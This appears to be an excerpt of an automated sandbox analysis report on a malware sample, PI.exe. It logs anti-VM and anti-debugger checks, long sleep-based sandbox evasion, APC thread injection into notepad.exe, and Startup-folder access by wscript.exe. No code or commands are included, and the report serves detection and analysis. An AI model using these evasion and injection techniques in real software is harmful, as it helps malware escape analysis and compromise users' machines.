Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_0043061C	0_2_0043061C
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_0043061C	3_2_0043061C
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_0043061C	5_2_0043061C

Delayed program exit found

Show sources

Source: C:\Windows\SysWOW64\notepad.exe	Code function: 1_2_032305C0 Sleep,ExitProcess,		1_2_032305C0
Source: C:\Windows\SysWOW64\notepad.exe	Code function: 6_2_00CB05C0 Sleep,ExitProcess,		6_2_00CB05C0

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\PI.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\PI.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	0_2_00453E2C
Source: C:\Users\user\Desktop\PI.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	3_2_00453E2C
Source: C:\Users\user\Desktop\PI.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,	5_2_00453E2C

Source: C:\Users\user\Desktop\PI.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

Code function: 5_2_0043061C

5_2_0043061C

Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -118624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -88641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -88359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -117440s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -87330s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -115624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -115188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -56906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -113440s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -113000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -83718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -111188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -110812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -109440s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -109000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -108624s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -80109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -79830s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -79500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -52720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -52500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -78468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -78141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -51720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -76830s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -76500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -101188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -49906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -49720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -99000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -73218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -72891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -96812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -96440s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -71250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -70968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -69609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -69330s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -46000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -45720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -67968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -67359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -44720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -66330s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -66000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -43812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -64359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -64080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -41812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -41594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -41406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -82440s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -61080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -60468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -60141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -39594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -58830s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -58500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -58218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -38500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -57141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -56859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -56580s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -55830s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -55500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -55218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -54891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -36094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -53859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -35720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -53250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -52218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -51891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -34406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -51330s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -33906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -33720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -50250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -49641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -32812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -32594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -48609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -46968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -61440s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -45750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -44718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -42750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -38859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -38580s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -37218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -35580s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -35250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -89718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -89391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -87750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -86109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -85830s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -84468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -54094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -80580s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -75609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -75330s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -73968s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -73641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -48000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -64830s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -63141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -61500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -39906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -39720s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -38594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -36220s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -35094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -32906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -31812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -31594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -55220s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -52594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -51500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -47094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -46906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -45812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -45094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -43406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -42312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6912	Thread sleep time: -30906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe TID: 6552	Thread sleep count: 74 > 30	Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\PI.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\PI.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\PI.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\PI.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00475588 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 004755A3h	0_2_00475588
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00475588 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 004755A3h	3_2_00475588
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00475588 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 004755A3h	5_2_00475588

Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00408994 FindFirstFileA,GetLastError,	0_2_00408994
Source: C:\Users\user\Desktop\PI.exe	Code function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_00405AE8
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00408994 FindFirstFileA,GetLastError,	3_2_00408994
Source: C:\Users\user\Desktop\PI.exe	Code function: 3_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	3_2_00405AE8
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00408994 FindFirstFileA,GetLastError,	5_2_00408994
Source: C:\Users\user\Desktop\PI.exe	Code function: 5_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	5_2_00405AE8

Source: C:\Users\user\Desktop\PI.exe

Code function: 0_2_00420FE4 GetSystemInfo,

0_2_00420FE4

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: PI.exe, 00000002.00000002.944104826.0000000005210000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: PI.exe, 00000002.00000002.944104826.0000000005210000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: PI.exe, 00000002.00000002.944104826.0000000005210000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000004.00000002.702851391.0000022471482000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Z
Source: wscript.exe, 00000004.00000002.702851391.0000022471482000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: PI.exe, 00000002.00000002.944519197.0000000005A20000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: PI.exe, 00000002.00000002.944104826.0000000005210000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\PI.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process queried: DebugFlags	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process queried: DebugObjectHandle	Jump to behavior

Source: C:\Users\user\Desktop\PI.exe

Code function: 2_2_04E33468 LdrInitializeThunk,

2_2_04E33468

Source: C:\Users\user\Desktop\PI.exe

Code function: 2_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_004696F3

Source: C:\Users\user\Desktop\PI.exe

0_2_00440918

Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0046D412 mov eax, dword ptr fs:[00000030h]	2_2_0046D412
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0046D4D0 mov eax, dword ptr fs:[00000030h]	2_2_0046D4D0
Source: C:\Users\user\Desktop\PI.exe	Code function: 7_2_0046D412 mov eax, dword ptr fs:[00000030h]	7_2_0046D412
Source: C:\Users\user\Desktop\PI.exe	Code function: 7_2_0046D4D0 mov eax, dword ptr fs:[00000030h]	7_2_0046D4D0

Source: C:\Users\user\Desktop\PI.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_004696F3
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_00468746 SetUnhandledExceptionFilter,	2_2_00468746
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_0046BD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0046BD7F
Source: C:\Users\user\Desktop\PI.exe	Code function: 2_2_00469BB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00469BB5
Source: C:\Users\user\Desktop\PI.exe	Code function: 7_2_0046BD7F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0046BD7F
Source: C:\Users\user\Desktop\PI.exe	Code function: 7_2_004696F3 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_004696F3
Source: C:\Users\user\Desktop\PI.exe	Code function: 7_2_00469BB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00469BB5

Source: C:\Users\user\Desktop\PI.exe

Memory protected: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\Desktop\PI.exe	Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 3230000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Memory allocated: C:\Windows\SysWOW64\notepad.exe base: 3240000 protect: page read and write	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Memory allocated: C:\Windows\SysWOW64\notepad.exe base: CB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Memory allocated: C:\Windows\SysWOW64\notepad.exe base: CC0000 protect: page read and write	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\PI.exe	Section loaded: unknown target: C:\Users\user\Desktop\PI.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Section loaded: unknown target: C:\Users\user\Desktop\PI.exe protection: execute and read and write			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\PI.exe

Thread APC queued: target process: C:\Windows\SysWOW64\notepad.exe

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\PI.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: 3230000	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: 3240000	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: CB0000	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Memory written: C:\Windows\SysWOW64\notepad.exe base: CC0000	Jump to behavior

Source: C:\Users\user\Desktop\PI.exe	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'	Jump to behavior
Source: C:\Users\user\Desktop\PI.exe	Process created: C:\Users\user\Desktop\PI.exe 'C:\Users\user\Desktop\PI.exe'	Jump to behavior

Source: PI.exe, 00000002.00000002.942302186.0000000000D70000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: PI.exe, 00000002.00000002.942302186.0000000000D70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: PI.exe, 00000002.00000002.942302186.0000000000D70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: PI.exe, 00000002.00000002.942302186.0000000000D70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PI.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00405CA0
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,GetACP,	0_2_0040AD2C
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,	0_2_004099FC
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,	0_2_004099B0
Source: C:\Users\user\Desktop\PI.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_00405DAC
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,	2_2_0046CA4A
Source: C:\Users\user\Desktop\PI.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	3_2_00405CA0
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,GetACP,	3_2_0040AD2C
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,	3_2_004099FC
Source: C:\Users\user\Desktop\PI.exe	Code function: GetLocaleInfoA,	3_2_004099B0
Source: C:\Users\user\Desktop\PI.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	3_2_00405DAC
